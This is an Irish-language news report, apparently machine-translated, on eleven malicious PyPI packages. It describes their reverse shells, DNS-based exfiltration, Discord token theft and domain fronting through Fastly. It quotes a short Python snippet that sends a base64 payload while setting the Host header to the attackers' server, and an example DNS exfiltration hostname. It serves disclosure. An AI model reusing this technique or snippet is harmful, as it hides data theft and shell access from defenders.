Sa eolaire PyPI (Python Package Index), aithníodh 11 phacáiste ina raibh cód mailíseach. Sular aithníodh fadhbanna, íoslódáladh na pacáistí thart ar 38 míle uair san iomlán. Tá na pacáistí mailíseacha braite suntasach mar gheall ar a n-úsáid modhanna sofaisticiúla chun bealaí cumarsáide a cheilt le freastalaithe na n-ionsaitheoirí.
- importantpackage (6305 íosluchtú), important-package (12897) - bhunaigh sé nasc le freastalaí seachtrach faoi chruth nascadh le pypi.python.org chun rochtain blaosc a sholáthar ar an gcóras (bhlaosc droim ar ais) agus d’úsáid sé an clár trevorc2 chun an córas a cheilt cainéal cumarsáide.
- pptest (10001), ipboards (946) - úsáidtear DNS mar chainéal cumarsáide chun faisnéis a tharchur faoin gcóras (sa chéad phaicéad an t-ainm óstach, eolaire oibre, IP inmheánach agus seachtrach, sa dara ceann - an t-ainm úsáideora agus an t-ainm óstach) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - d'aithin an comhartha seirbhíse Discord sa chóras agus sheol chuig óstach seachtrach é.
- trrfab (287) - chuir sé an t-aitheantóir, an t-ainm óstaigh agus a bhfuil ann /etc/passwd, /etc/hosts, / home chuig an óstaigh seachtrach.
- 10Cent10 (490) - bhunaigh nasc-bhlaosc droim ar ais le hóstach seachtrach.
- yandex-yt (4183) - thaispeáin sé teachtaireacht faoin gcóras a bheith i gcontúirt agus atreoraíodh chuig leathanach le faisnéis bhreise faoi ghníomhaíochtaí breise a eisíodh trí nda.ya.ru (api.ya.cc).
Is díol suntais ar leith an modh chun rochtain a fháil ar óstaigh sheachtracha a úsáidtear sa phacáiste tábhachtach agus sa phacáiste tábhachtach, a d’úsáid an líonra seachadta ábhair Fastly a úsáidtear san eolaire PyPI chun a ngníomhaíocht a cheilt. Go deimhin, cuireadh iarratais chuig an bhfreastalaí pypi.python.org (lena n-áirítear an t-ainm python.org in SNI a shonrú taobh istigh den iarratas HTTPS), ach chuir an ceanntásc HTTP “Óstríomhaire” ainm an fhreastalaí a bhí á rialú ag na hionsaitheoirí (soic. ar aghaidh.io. global.prod.fastly.net). Sheol an líonra seachadta inneachair iarratas comhchosúil chuig an bhfreastalaí ionsaithe, ag baint úsáide as paraiméadair an nasc TLS chuig pypi.python.org agus sonraí á dtarchur.
Tá an bonneagar PyPI á thiomáint ag líonra seachadta ábhar Fastly, a úsáideann seachfhreastalaí trédhearcach Varnish chun iarratais tipiciúil a thaisceadh, agus úsáideann sé próiseáil deimhnithe TLS ag leibhéal CDN, seachas ag na freastalaithe deiridh, chun iarratais HTTPS a chur ar aghaidh trí sheachvótálaí. Beag beann ar an sprioc-óstach, seoltar iarratais chuig an seachfhreastalaí, a chinneann an t-óstach atá ag teastáil ag baint úsáide as an gceanntásc HTTP “Óstríomhaire”, agus tá na hainmneacha fearainn óstach ceangailte leis na seoltaí IP cothromóir ualach CDN atá tipiciúil do gach cliant Fastly.
Cláraíonn freastalaí na n-ionsaitheoirí freisin le CDN Fastly, a sholáthraíonn pleananna saor in aisce do gach duine agus fiú a cheadaíonn clárú gan ainm. Is fiú a thabhairt faoi deara go n-úsáidtear scéim freisin chun iarratais a sheoladh chuig an íospartach agus “blaosc droim ar ais” á chruthú, ach tionscnaítear é ó thaobh ósta an ionsaitheora. Ón taobh amuigh, is cosúil le hidirghníomhú le freastalaí an ionsaitheora seisiún dlisteanach leis an eolaire PyPI, criptithe ag baint úsáide as deimhniú PyPI TLS. Úsáideadh teicníocht den chineál céanna, ar a dtugtar “éadanas fearainn,” go gníomhach roimhe seo chun an t-ainm óstach a cheilt agus an blocáil á sheachbhóthar, ag baint úsáide as an gcumas a sholáthraítear i roinnt líonraí CDN chun rochtain a fháil ar HTTPS trí óstach bréige a léiriú sa SNI agus i ndáiríre ag tarchur ainm an óstach iarrtha sa cheanntásc Óstach HTTP taobh istigh de sheisiún TLS.
Chun gníomhaíocht mhailíseach a cheilt, baineadh úsáid as an bpacáiste TrevorC2 freisin chun idirghníomhaíocht a dhéanamh leis an bhfreastalaí cosúil le gnáthsheoladh gréasáin, mar shampla, seoladh iarratais mhailíseacha faoi chruth an íomhá a íoslódáil “https://pypi.python.org/images/ guid=” le hionchódú faisnéise i bparaiméadar treorach. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = { 'Óstríomhaire': "psec.forward.io.global.prod.fastly.net"})
Bhain na pacáistí pptest agus ipboards úsáid as cur chuige difriúil chun gníomhaíocht líonra a cheilt, bunaithe ar fhaisnéis úsáideach a ionchódú i bhfiosruithe chuig an bhfreastalaí DNS. Tarchuireann an malware faisnéis trí iarratais DNS a dhéanamh mar “nu4timjagq4fimbuhe.example.com”, ina ndéantar na sonraí a tharchuirtear chuig an bhfreastalaí rialaithe a ionchódú ag baint úsáide as an bhformáid base64 san ainm fofhearainn. Faigheann an t-ionsaitheoir na teachtaireachtaí seo trí fhreastalaí DNS a rialú don fhearann example.com.
Foinse: oscailtenet.ru